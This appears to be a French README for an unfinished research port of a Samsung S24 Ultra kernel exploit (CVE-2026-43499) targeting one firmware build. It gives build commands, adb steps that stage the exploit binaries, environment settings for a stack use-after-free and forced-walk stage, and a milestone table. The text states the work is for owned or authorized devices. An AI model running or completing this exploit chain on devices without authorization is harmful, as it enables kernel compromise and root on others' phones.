
CVE-2026-43499 port de recherche pour Galaxy S24 Ultra SM-S928U1 DZF2 (TERMINÉ)
Port de recherche spécifique à l'appareil de CVE-2026-43499 pour le Samsung Galaxy S24 Ultra américain sous firmware S928USQS6DZF2 (domaine applicatif / chemin de production).
Ce dépôt est la contrepartie S24U de CVE-2026-43499-S25U. Il reflète l'état actuel incomplet : le plan de contrôle et l'armement de l'UAF de pile résiduelle sont en place ; une écriture de porte propre (hits>0) n'est pas encore atteinte.
Model: SM-S928U1
Codename: e3q
Android: 14 / BP4A.251205.006 (display family)
Build / AP: S928U1UES6DZF2 / S928USQS6DZF2
Fingerprint: samsung/e3qsqw/e3q:14/UP1A.231005.007/S928USQS6DZF2:user/release-keys
Kernel: 6.1.145-android14-11-33419968-abS928USQS6DZF2
Architecture: arm64 / 4K pages
Les décalages et dispositions ne s'appliquent qu'à ce firmware. Ne transférez pas de constantes entre builds sans preuve.
Blocage : géométrie résiduelle sûre pour le walk. Un vrai plant RB_EMPTY nécessite une VA noyau résiduelle (APP_STAMP_RESIDUAL_ADDR / APP_STAMP_OVERLAY_BASE). Les arbres forgés et les overlays KEEP (qui se mettent à zéro sous FD_ZERO) provoquent un panic lors du walk forcé. Voir docs/PROGRESS.md.
agent/s928u-bp4a-251205-006 (E3Q DZF2)Licence Apache 2.0 : LICENSE.
e3q-S928USQS6DZF2 (oracle P0 physique, disposition des banques, géométrie de pipe pour DZF2).cve-2026-43499-app.so) avec slide_app.c : plants de stamp résiduels, soft_match, walk REPLANT, walk_nice, NO_PLANT, hooks de plant EMPTY, peek de banque, câblage de drain.O_APPEND (évite l'écrasement des journaux parent/enfant).export ANDROID_NDK_HOME=/path/to/ndk # e.g. r28 / API 34 clang
make -j$(nproc)
# or:
make app API=34
Sorties :
build/e3q-S928USQS6DZF2/cve-2026-43499-app.so
build/e3q-S928USQS6DZF2/cve-2026-43499-root
build/e3q-S928USQS6DZF2/cve-2026-43499 # optional standalone
ADB Windows (ou adb hôte) vers le numéro de série R5CXB20H9FD (exemple d'unité de recherche) :
# Prefer the rebuilt helper (O_APPEND logs), not only the APK copy.
adb push build/e3q-S928USQS6DZF2/cve-2026-43499-app.so /data/local/tmp/
adb push build/e3q-S928USQS6DZF2/cve-2026-43499-root /data/local/tmp/
adb shell "run-as dev.busung.s25uroot sh -c '
mkdir -p files/payload-overrides/e3q-S928USQS6DZF2
cp /data/local/tmp/cve-2026-43499-app.so \
files/payload-overrides/e3q-S928USQS6DZF2/
cp /data/local/tmp/cve-2026-43499-root files/
chmod 700 files/cve-2026-43499-root \
files/payload-overrides/e3q-S928USQS6DZF2/cve-2026-43499-app.so
'"
export APP_STACK_UAF_STAMP=1
export APP_STAMP_PLANT=soft
export APP_STAMP_SOFT_MATCH=1
export APP_STAMP_FIXED_SHIFT=2
export APP_BANK_VALID_ROOT=1
export APP_STAMP_STATUS_PATH=/data/user/0/dev.busung.s25uroot/files/stamp_status_last.txt
# run via helper --run-payload ... (see docs/PROGRESS.md)
# After soft_match plant: change residual prio then force task nice change.
export APP_STAMP_REPLANT_WALK=1
export APP_STAMP_WALK_PRIO=100
export APP_STAMP_WALK_NICE=18 # must differ from first nice (default 19)
# Prefer EMPTY bank for some paths; still KP without residual kVA EMPTY plant
Ne pas re-scanner les décalages de plant 0–4 ; la base 2 est établie.
| Doc | Contenu |
|---|---|
| docs/PROGRESS.md | Matrice des jalons, revendications OBS/SRC, point d'arrêt |
| docs/ENV_REFERENCE.md |
À utiliser uniquement sur des appareils que vous possédez ou pour lesquels vous êtes explicitement autorisé à tester. Cette arborescence est un logiciel de recherche pour un chemin de téléphone de production verrouillé ; ce n'est pas un root terminé ni un installeur KernelSU.
L'intégration KernelSU est hors du périmètre jusqu'à ce qu' une écriture pipe/phys fiable et un chemin root existent. Ne considérez pas ce dépôt comme prêt pour KSU.
| Étape | Statut |
|---|
| Fuite mm KernelSnitch / préparation des pages | Fonctionne en production |
| Récupération de banque + MSG_PEEK (owner=1) | Fonctionnel |
| Armement UAF de pile résiduelle classique EDEADLK | Fonctionnel |
| Plant de pile (nfds ≤ 320, base résiduelle shift=2) | Fonctionnel |
| Correspondance de sortie anticipée @ prio 120 (pas 139) | Fonctionnel |
| Géométrie d'écriture douce sous sortie anticipée | Planté sans risque ; pas de walk |
REPLANT + walk_nice forcent la marche adjust_pi | Prouvé ; toujours KP jusqu'ici |
Oracle de porte hits>0 | Ouvert |
| Pipe phys-rw / root Android / KernelSU | Non atteint |
| Variables d'environnement pour les chemins stamp/banque |
| docs/RUN_HISTORY.md | Historique condensé des exécutions sur appareil (RUN047–062) |